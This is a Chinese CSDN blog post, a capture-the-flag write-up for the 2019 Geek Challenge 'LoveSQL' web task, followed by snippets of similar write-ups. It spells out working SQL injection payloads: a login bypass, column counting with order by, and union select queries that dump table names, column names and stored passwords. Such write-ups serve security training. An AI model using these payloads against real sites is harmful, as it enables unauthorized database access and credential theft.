极客大挑战 2019 lovesql wp

最新推荐文章于 2024-07-23 14:05:29 发布
最新推荐文章于 2024-07-23 14:05:29 发布
阅读量464 收藏
点赞数
分类专栏: CTF-WEB 文章标签: 数据库 sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/127970998
版权

启动环境
在这里插入图片描述
输入1 1尝试登录
在源码处显示
在这里插入图片描述
尝试万能密码
username=1&password='or 1='1 %23
得到
在这里插入图片描述
order by一下
发现4的时候报错
在这里插入图片描述
爆数据库
username=1&password='union select 1,2,database()
在这里插入图片描述
得到数据库名:geek
爆表名
username=1&password='union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘geek’%23
在这里插入图片描述
两张表 geekuser 10velysql
爆字段
username=1&password='union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = ‘geek’%23
在这里插入图片描述
先看第二张表吧
username=1&password='union select 1,2,group_concat(password) from l0ve1ysq1 %23
直接拿到flag
在这里插入图片描述

丨Arcueid丨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF系列 // [挑战 2019] LoveSQL
qq_45805420的博客
10-03 506
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
[挑战 2019]LoveSQL
kuller_Yan的博客
05-19 274
[挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看题目 一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
BUU-[挑战 2019]LoveSQL 1 --wp
m0_62851980的博客
07-08 1036
知识点:group_concat语法,联合查询(union)1.打开靶机,登录界面我们直接万能密码'or 1=1#登进去试试: 登入进去看到:2. 得到用户名和密码,不过拿去md5没有用,用order by查询字段数: 在增加到4的时候,报错: 3.那就说明一共有3个字段嘛,接下来我们查找回显点位,用union查询测试注入点:4.可以看到注入点为2,3,那么接下来查询数据库名和版本: 5.得到数据库名:geek,接下来我们查询表名: 注:group_concat的使用:得到当前库的所有表 :select g
buu [挑战 2019]LoveSQL 1
weixin_45642610的博客
01-10 1867
buu [挑战 2019]LoveSQL 1 -刷题个人日记 小白一个,写给自己看。 进去后是这样: 用户名输入1和1'测试 发现1'报错 有sql语法错误,说明有sql注入点且后台数据库是MariaDB 用户名输入sql注入基本公式:1' or 1=1;# 结果: 3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。 可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。 慢慢来,payload: check.php?username=admin'
[挑战 2019]LoveSQL wp
{OvEr}的博客
11-19 163
[挑战 2019]LoveSQL wp 打开页面是这样的,我们先试试万能密码 显示登陆成功,通过上面的url可以判断有sql注入且为get方式下面我们来进行注入。 首先我们来查列数,注入 ?username=admin&password=123 %27 order by 4%23 发现不存在,说明有1,2,3列,继续我们来找注入点,注入语句 ?username=admin&password=123 %27 union select 1,2,3 %23 找到注入点是2,3
【CTF_SQL】[挑战 2019]LoveSQL 1
十二_的博客
10-22 2152
WP来学习他们的思路,多刷题,以形成自己的思路,常刷,常总是不可避免的,尽管菜鸟小编并做不到。一般的套路使用之后,我们要先熟悉这个数据库相关SQL注入的基本语法或公式,才能进一步破解;这里,我们就需要对常用的一些编码格式有一定的了解。本道题,我们要观察它是什么编码?一开始,对于菜鸟级别的我们来说,一般是不了解的。再来回想一下,我们刚才出现的编码是什么?编码,参加过全国大学生数学建模大赛的或者知道。进入环境,我们就尝试去最经典的万能密码。不信,咱们最好还是测试一下吧,有点像。所以,sql注入是可以的~~~
[挑战 2019]BabySQL1
m0_73721944的博客
11-11 196
检查与您的MariaDB服务器版本对应的手册,以便在第1行'1=1#'和password='123 "附近使用正确的语法。1'ununionion seselectlect 1,2,3#&passward=1 有回显,说明有三列。1’ order by 3#&passward=123 报错发现order中的or与by都被过滤了。1'ununionion seselectlect 1,2,3,4#&passward=1 报错。打开是这样的,是之前两个题的升级版。有回显说明双写绕过是可行的。
BUUCTF_WP_[挑战 2019]LoveSQL
Accompany的博客
11-29 3089
文章目录首先我们随意输入用户名,密码,判断此为get方式传参紧接着闭合密码便可以很容易地得出此为一个get基于报错的注入开始注入,get基于报错的常规流程 首先我们随意输入用户名,密码,判断此为get方式传参 紧接着闭合密码便可以很容易地得出此为一个get基于报错的注入 当然碰到登陆页面我们首先想到的便是万能密码,也可以知道此为sql注入 开始注入,get基于报错的常规流程 order by判断字段数 1' order by 4# 1' order by 3# 说明有三个字段 紧接着判断回
buuctf-web-[挑战 2019]LoveSQL-wp
居上
06-27 148
[挑战 2019]LoveSQL 知识点 常规union select注入 过程 主页: 抓包分析下 手动测试下注入点 order by查下字段 admin' order by 3# union select寻找显示位 -admin' union select 1,2,3%23 查表 -admin' union select 1,(select group_concat(table_name) from information_schema.tables where tab
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
谷杯WP1
08-03
谷杯WP1反编译分析 标题解释 "谷杯WP1"是指在谷平台上的一个WP1项目,WP1是指Web Protection 1的缩写,表示该项目是一个Web保护项目。 描述解释 描述信息为空,但结合标签"软件/插件 intellij idea...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 学院JAVA视频教程 新版 7大部分
基于JSP的高校信息资源共享平台
heye0910032的博客
07-22 677
高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。通过使用JSP技术和MySQL数据库,本系统实现了一个稳定、安全、易用的高校信息资源管理平台。虽然在开发过程中遇到了一些技术挑战,但通过不断学习和实践,最终完成了一个能够满足用户需求的系统。未来,我们将继续优化系统功能,提升用户体验,以期达到更高的应用价值和社会效益。高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。
秒杀业务: 简单梳理
最新发布
m0_59925573的博客
07-23 1535
(1)在一人一单优惠券秒杀中,先是解决了因线程安全导致的超卖问题,为了满足一人一单的业务需求需要给查询订单表查询库存表上锁,但是synchronized只能满足单机环境下线程安全,在分布式环境对多个JVM需要使用分布式锁,于是手写分布式锁,但是在端情况下,例如业务超时,会出现“误删”问题,手写锁无法解决,于是引入redisson,借助看门狗机制可以有效解决这个问题。
04-用户画像+sqoop使用
weixin_46567476的博客
07-21 583
sqoop的作用是实现数据的导入和导出,主要是对数据库和数据仓库之间的操作。qoop脚本就是将sqoop指令写入shell文件 后缀是 .sh。只要是支持jdbc连接的数据库都可以使用sqoop操作。
redis常用指令
m0_62289159的博客
07-22 797
redis常用指令
挑战 2019]LoveSQL 1
08-24
LoveSQL 1是挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值